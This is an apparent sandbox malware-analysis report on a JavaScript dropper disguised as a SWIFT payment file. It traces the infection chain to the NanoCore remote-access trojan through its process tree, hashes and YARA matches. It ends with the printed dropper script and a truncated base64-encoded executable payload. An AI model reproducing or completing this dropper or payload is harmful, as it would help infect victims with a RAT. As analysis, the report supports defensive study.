            SHA-512:CBB0DB98BA8D3C615E79358AEA82809FD28C41254AEF929DF7921FB025646006FA160AA8E25F52B75481F2054EABEF0B869647403016C2B9C998081028660B9E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.|.v..Vv..Wv..Vvdr.v|.Vvdr.v..VvRich..Vv........................PE..L......c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1572864
            Entropy (8bit):4.290562845405301
            Encrypted:false
            SSDEEP:12288:bJirg2U4Q93X7IrDzT6o1Ka9oCOj3dsltOexPF4ue7NGupPxM/MMBf2+:9irg2U4Q93rIrDV80P60
            MD5:6838F4DD693AD09B90509872C2C8F420
            SHA1:82C2413D9EBDAF1C86AEF7822842AAD70EA42688
            SHA-256:31977ABB9C9AF47FE5017B3723060BBC20D937E2EA3CB31E4454BE93A2544094
            SHA-512:503367467335CD56F380E04D4E0D6E6B2BCA0BDB337214D2EFFE8BDE648C6405E34C16AF26791272FAD35B6CEBA9CE1E9DBAC472A187FA981F1AB0F3A1E5E9F8
            Malicious:false
            Preview:regf^...^...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.D"+F7................................................................................................................................................................................................................................................................................................................................................+v........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):24576
            Entropy (8bit):3.728145926977052
            Encrypted:false
            SSDEEP:384:lS5/+ZllyBA+0W6mIpn88aTVgGFT+ZODvkZz4pWXSQlB:ls/+ZllGA+9S88AVgGpvDvTWt
            MD5:D2541961A4A21765E4E7EBE38573DAC2
            SHA1:567E5259771A672219405E7CDC4B5194346510EF
            SHA-256:48BBF28E868C85C59D0EF72F3F225431D12127FD18AB7574EBA4DC30B2F7846A
            SHA-512:74109C63BA0B757C853E9FF333226D80BDAD0051D38232976CD5A3E74D2A910B3A6D3C5785F4C37DE25D6D4873CE53AB772A506454785F0A25BF3687E7D950E7
            Malicious:false
            Preview:regf]...]...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.D"+F7................................................................................................................................................................................................................................................................................................................................................+vHvLE.^......]..............Pa......6..8N............................. ..hbin................p.\..,..........nk,./.$+F7.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ./.$+F7...... ........................... .......Z.......................Root........lf......Root....nk ./.$+F7...................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck...
            File type:ASCII text, with very long lines (65536), with no line terminators
            Entropy (8bit):5.984009951816934
            TrID:
              File name:SWIFT MO104978172_1301 EURO 9700.js
              File size:427766
              MD5:0d6f726c3c2a4f6e82f0ede90ba88155
              SHA1:668eb996c241e10fb19c3a6ae5024309470be171
              SHA256:658c78c61ac43dc28e128cd71060b2c5ab03ed241cbcd32c5a0f5a09f081a574
              SHA512:ed0911a59d532ef9012abcd2ef27e963a19ae6d8b352e60208857b7ff038b2ed940e8bcdede67f4255674e4a6b8921740241a53c79cbb784437e1be3d68ba063
              SSDEEP:6144:BKWuoMfFEsrEGwfIWcvAoQlZPDhPvFPbr7zrdvBDHp+Nwsk/USGrtfy0nt:BKlV3EbqApDhPvFHDJ+NwpBort
              TLSH:7C9412BEC91E8EC62B3D19E5B0682C162E5C4ED7563A42F0FD48504771FF210E9A6CB9
              File Content Preview:try{String.prototype.endsWith = function(needle){.var emp = this.substr(this.length - needle.length);.return emp == needle;};var aso_ibora = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc
              Icon Hash:e8d69ece968a9ec4
              Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:12:37:10
              Start date:02/02/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT MO104978172_1301 EURO 9700.js"
              Imagebase:0x7ff72f120000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:1
              Start time:12:37:13
              Start date:02/02/2023
              Path:C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"
              Imagebase:0x400000
              File size:320087 bytes
              MD5 hash:E1EA8B4960D24E0E5742BBFCB3C0B240
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              Target ID:2
              Start time:12:37:13
              Start date:02/02/2023
              Path:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v
              Imagebase:0x400000
              File size:76800 bytes
              MD5 hash:34037A20C292EAB6F90C3D9AB1334348
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:3
              Start time:12:37:15
              Start date:02/02/2023
              Path:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
              Imagebase:0x400000
              File size:76800 bytes
              MD5 hash:34037A20C292EAB6F90C3D9AB1334348
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:8
              Start time:12:37:24
              Start date:02/02/2023
              Path:C:\Users\user\AppData\Local\Temp\fdqkbs.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\fdqkbs.exe"
              Imagebase:0x400000
              File size:76800 bytes
              MD5 hash:34037A20C292EAB6F90C3D9AB1334348
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:11
              Start time:12:37:27
              Start date:02/02/2023
              Path:C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
              Imagebase:0x400000
              File size:76800 bytes
              MD5 hash:34037A20C292EAB6F90C3D9AB1334348
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:12
              Start time:12:37:29
              Start date:02/02/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624
              Imagebase:0x1360000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:14
              Start time:12:37:30
              Start date:02/02/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 656
              Imagebase:0x1360000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:21
              Start time:12:37:37
              Start date:02/02/2023
              Path:C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
              Imagebase:0x400000
              File size:76800 bytes
              MD5 hash:34037A20C292EAB6F90C3D9AB1334348
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low

              Target ID:23
              Start time:12:37:38
              Start date:02/02/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 628
              Imagebase:0x7ff7a4ea0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Call Graph

              • Executed
              • Not Executed
              callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C0 clusterC8C0 clusterC10C0 clusterC12C0 clusterC14C0 clusterC34C0 clusterC16C0 clusterC18C0 clusterC32C0 clusterC20C0 clusterC22C0 clusterC30C0 clusterC24C0 clusterC26C0 clusterC28C0 E1C0 entry:C0 F7C6 CreateObject E1C0->F7C6 F9C8 createElement E1C0->F9C8 F11C10 CreateObject E1C0->F11C10 F13C12 Open E1C0->F13C12 F15C14 Write E1C0->F15C14 F17C16 CreateObject E1C0->F17C16 F19C18 ExpandEnvironmentStrings E1C0->F19C18 F21C20 ExpandEnvironmentStrings E1C0->F21C20 F23C22 SaveToFile E1C0->F23C22 F25C24 endsWith E1C0->F25C24 F27C26 run E1C0->F27C26 F29C28 endsWith E1C0->F29C28 F31C30 endsWith E1C0->F31C30 F33C32 run E1C0->F33C32 F35C34 run E1C0->F35C34 F3C2 F5C4 substr F3C2->F5C4

              Script:

              Code
              0
              try
                1
                {
                  2
                  String.prototype.endsWith =
                    3
                    function (needle) {
                    • "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".jar") ➔ false
                    • "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".vbs") ➔ false
                    • "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".wsf") ➔ false
                    4
                    var emp = this.substr ( this.length - needle.length );
                    • C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe.substr(66) ➔ ".exe"
                    • C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe.substr(66) ➔ ".exe"
                    • C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe.substr(66) ➔ ".exe"
                    5
                    return emp == needle;
                      6
                      };
                        7
                        var aso_ibora = "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